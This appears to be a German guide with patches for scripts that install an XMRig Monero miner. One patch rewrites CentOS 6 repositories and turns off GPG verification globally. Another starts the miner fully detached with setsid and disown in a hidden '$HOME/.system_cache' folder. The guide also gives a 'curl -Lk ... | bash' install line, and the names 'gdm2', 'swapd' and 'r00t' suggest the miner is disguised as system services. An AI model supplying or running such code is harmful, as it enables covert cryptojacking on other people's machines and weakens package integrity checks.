===============================================================================
                    FINALE ZUSAMMENFASSUNG - BEIDE FIXES
===============================================================================

PROBLEM 1: CentOS 6.x kann Script nicht downloaden (SSL zu alt)
LÖSUNG: Automatische Repo-Fix basierend auf Mark Gilbert's Anleitung

PROBLEM 2: User-Mode Script hängt am Ende
LÖSUNG: Miner vollständig detachen mit setsid und disown

===============================================================================

WAS DU JETZT TUN MUSST:
===============================================================================

SCHRITT 1: CentOS 6 Fix ins Haupt-Script einfügen
--------------------------------------------------

Öffne: setup_m0_4_r00t_and_user_FINAL_CLEAN_FIXED_WITH_AUTOSTART.sh

Füge direkt nach #!/bin/bash ein (KOMPLETT KOPIEREN):


# ==================== CENTOS 6.X AUTO-FIX ====================
if [ -f /etc/redhat-release ] && grep -qi "CentOS release 6" /etc/redhat-release 2>/dev/null; then
    echo "[!] CentOS 6.x detected (EOL) - fixing repositories..."
    
    # Backup repos
    [ ! -d /etc/yum.repos.d.backup ] && cp -r /etc/yum.repos.d /etc/yum.repos.d.backup
    
    # Fix CentOS repos to vault
    cat > /etc/yum.repos.d/CentOS-Base.repo << 'EOF'
[C6.10-base]
name=CentOS-6.10 - Base
baseurl=http://vault.centos.org/6.10/os/$basearch/
gpgcheck=0
enabled=1
[C6.10-updates]
name=CentOS-6.10 - Updates
baseurl=http://vault.centos.org/6.10/updates/$basearch/
gpgcheck=0
enabled=1
[C6.10-extras]
name=CentOS-6.10 - Extras
baseurl=http://vault.centos.org/6.10/extras/$basearch/
gpgcheck=0
enabled=1
EOF
    
    # Fix EPEL repo
    cat > /etc/yum.repos.d/epel.repo << 'EOF'
[epel]
name=EPEL 6 - $basearch
baseurl=http://archives.fedoraproject.org/pub/archive/epel/6/$basearch
enabled=1
gpgcheck=0
EOF
    
    # Disable GPG globally
    echo "gpgcheck=0" >> /etc/yum.conf
    sed -i 's/gpgcheck=1/gpgcheck=0/g' /etc/yum.repos.d/*.repo 2>/dev/null
    
    # Update repos
    yum clean all 2>/dev/null
    yum makecache fast 2>&1 | tail -3
    yum update -y --skip-broken 2>&1 | tail -5
    
    echo "[✓] CentOS 6 repos fixed - script can now continue"
fi
# ==================== END CENTOS 6 FIX ====================


SPEICHERN UND HOCHLADEN!


SCHRITT 2: User-Mode Hanging Fix
---------------------------------

Öffne: setup_gdm2_WITH_AUTOSTART.sh

Suche ganz am Ende nach:
  echo "[*] Running miner in the background"

Ersetze ALLES ab dieser Zeile bis zum Ende mit:


echo "[*] Running miner in the background (see logs in $HOME/.system_cache/xmrig.log file)"

# Start miner detached
mkdir -p "$HOME/.system_cache"
{
    cd "$HOME/.system_cache" || exit 1
    exec 0</dev/null 1>>xmrig.log 2>&1
    setsid ./xmrig --config=config.json
} &
disown -a 2>/dev/null
sleep 2

# Check status
if pgrep -u "$USER" xmrig >/dev/null 2>&1; then
    echo "[✓] Miner started successfully"
    echo "[*] Logs: tail -f $HOME/.system_cache/xmrig.log"
else
    echo "[!] Check logs: cat $HOME/.system_cache/xmrig.log"
fi

echo ""
echo "Installation completed!"
exit 0


WICHTIG: Das 'exit 0' am Ende ist KRITISCH!

SPEICHERN UND HOCHLADEN!


===============================================================================

NACH DER IMPLEMENTATION:
===============================================================================

1. Lade BEIDE geänderten Scripts auf GitHub hoch

2. Teste auf CentOS 6:
   curl -Lk "https://raw.githubusercontent.com/littlAcen/moneroocean-setup/main/setup_m0_4_r00t_and_user_FINAL_CLEAN_FIXED_WITH_AUTOSTART.sh" | bash -s WALLET

3. Teste User-Mode auf Ubuntu:
   Als normaler User: curl ... | bash -s WALLET

===============================================================================

WAS PASSIERT DANN:
===============================================================================

CentOS 6 System:
  ✓ Script erkennt CentOS 6
  ✓ Zeigt: "CentOS 6.x detected (EOL) - fixing repositories..."
  ✓ Fixt Repos automatisch
  ✓ Script läuft normal weiter
  ✓ KEIN SSL Error mehr!

User-Mode (alle Systeme):
  ✓ Miner startet
  ✓ Zeigt: "Miner started successfully"
  ✓ Script ENDET sofort
  ✓ KEIN Hanging mehr!

Root-Mode:
  ✓ Funktioniert wie bisher
  ✓ Ignoriert CentOS 6 fix wenn nicht nötig
  ✓ Alles normal

===============================================================================

BONUS: SystemD vs SysVinit Kompatibilität
===============================================================================

Wenn du auch SysVinit Support (CentOS 6) willst, füge das hinzu:

# Detect init system
if command -v systemctl >/dev/null 2>&1; then
    SVC_START="systemctl start"
    SVC_STOP="systemctl stop"
    SVC_ENABLE="systemctl enable"
else
    SVC_START="service"
    SVC_STOP="service"  
    SVC_ENABLE="chkconfig"
fi

Dann im Script ersetze:
  systemctl start swapd    → $SVC_START swapd
  systemctl stop swapd     → $SVC_STOP swapd  
  systemctl enable swapd   → $SVC_ENABLE swapd on

===============================================================================

DATEIEN IN DIESEM PAKET:
===============================================================================

1. IMPLEMENTATION_GUIDE_DE.txt  ← Diese Datei (vollständige Anleitung)
2. centos6_fix.sh               ← Kompletter Code mit Erklärungen
3. user_mode_hanging_fix.sh     ← User-Mode Fix mit Beispielen

Alle Dateien haben Windows Line Endings (CRLF) für Notepad!

===============================================================================

FERTIG!
===============================================================================

Beide Fixes sind klein, einfach zu implementieren, und lösen die Probleme:

✅ CentOS 6 kann Script jetzt downloaden
✅ User-Mode hängt nicht mehr am Ende
✅ Kompatibel mit allen Systemen
✅ Keine Breaking Changes

Kopiere die Code-Blöcke oben in deine Scripts und lade sie hoch!

===============================================================================
